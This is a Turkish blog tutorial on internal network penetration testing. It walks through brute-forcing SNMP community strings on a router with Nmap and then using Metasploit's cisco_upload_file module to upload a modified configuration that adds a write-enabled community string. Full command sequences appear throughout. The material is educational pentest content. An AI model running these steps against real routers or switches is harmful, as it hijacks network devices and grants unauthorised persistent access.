MSF cisco_upload_file Auxiliary Modülü Kullanılarak İç Ağ Sızma Testlerinde Switch ve Router Gibi Aktif Cihazlara Konfigürasyon Dosyalarının Transfer Edilmesi

İç ağ sızma testlerinde saldırı hedeflerinden birisi ağdaki 2. katmanda çalışan Switch gibi ve 3. katmanda çalışan Router gibi aktif cihazlara ait konfigürasyon dosyalarının değiştirilmesidir. Bu yazıda, iç ağda bulunan Switch/Router gibi cihazlara ait konfigürasyon dosyasıları MSF cisco_upload_file auxiliary modülü ile transfer edilmesi incelenecektir.

Not: Günümüzde sadece 2. katmanda çalışan ve Switch görevi gören cihazlara pek fazla rastlanmamaktadır. Bu sebeple, yazının devamında geçen Router olarak ifadeler Switch için de geçerlidir.

Mevcut durumda Nmap snmp-brute betiğine argüman olarak bir sözlük dosyası verildiğinde, sözlükteki “public” topluluk isminin Router için kullanıldığı görülmektedir.

cat /root/Desktop/ToplulukIsımleri.txt
nmap 192.168.0.200 -sU -p161 –open -Pn -n –script=snmp-brute –script-args snmp-brute.communitiesdb=/root/Desktop/ToplulukIsımleri.txt

uploading-configuration-file-of-active-devices-such-as-switch-or-router-by-using-msf-cisco-upload-file-auxiliary-module-01

Bu Router’a ait olan konfigürasyon dosyasının aşağıdaki gibi olduğunu varsayalım.

uploading-configuration-file-of-active-devices-such-as-switch-or-router-by-using-msf-cisco-upload-file-auxiliary-module-02

Konfigürasyon bilgisi elde edildikten sonra Router üzerinde herhangi bir değişiklik yapılabilir. Böylece Router için bir yeni bir kullanıcı oluşturulabilir, bir bağlantı (SSH, Telnet, HTTP gibi) açılabilir veya kurallarda değişiklik yapılarak normalde erişim sağlanamayan bir ağa erişim sağlanabilir. Bu yazı için örnek olarak yazma ve okuma izni olan yeni bir topluluk ismi eklenecektir.

Elde edilen bu konfigürasyon dosyasına “test” adlı ve yazma izni olan bir topluluk ismi eklenecek ve yeni konfigürasyon dosyası Router’un konfigürasyon dosyası olarak kaydedilecektir.

uploading-configuration-file-of-active-devices-such-as-switch-or-router-by-using-msf-cisco-upload-file-auxiliary-module-03

Kaydedilen konfigürasyon dosyasının kaydedilmesi için MSF cisco_upload_file auxiliary modülü seçilir ve seçenekleri listelenir.

search cisco_upload_file
use auxiliary/scanner/snmp/cisco_upload_file
show options

uploading-configuration-file-of-active-devices-such-as-switch-or-router-by-using-msf-cisco-upload-file-auxiliary-module-04

Modül seçenekleri ayarlanır.

set RHOSTS 192.168.0.200
set COMMUNITY private
set SOURCE /root/Desktop/192.168.0.200.txt
set VERSION 2c
show options

uploading-configuration-file-of-active-devices-such-as-switch-or-router-by-using-msf-cisco-upload-file-auxiliary-module-05

Modül çalıştırılarak transfer işlemi gerçekleştirilir.

run

uploading-configuration-file-of-active-devices-such-as-switch-or-router-by-using-msf-cisco-upload-file-auxiliary-module-06

Transfer işleminden sonra, Nmap snmp-brute betiğine argüman olarak aynı sözlük dosyası verildiğinde, sözlükteki “public” topluluk isminin yanı sıra, “test” topluluk isminin de Router için kullanıldığı görülmektedir.

cat /root/Desktop/ToplulukIsımleri.txt
nmap 192.168.0.200 -sU -p161 –open -Pn -n –script=snmp-brute –script-args snmp-brute.communitiesdb=/root/Desktop/ToplulukIsımleri.txt

uploading-configuration-file-of-active-devices-such-as-switch-or-router-by-using-msf-cisco-upload-file-auxiliary-module-07

 

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.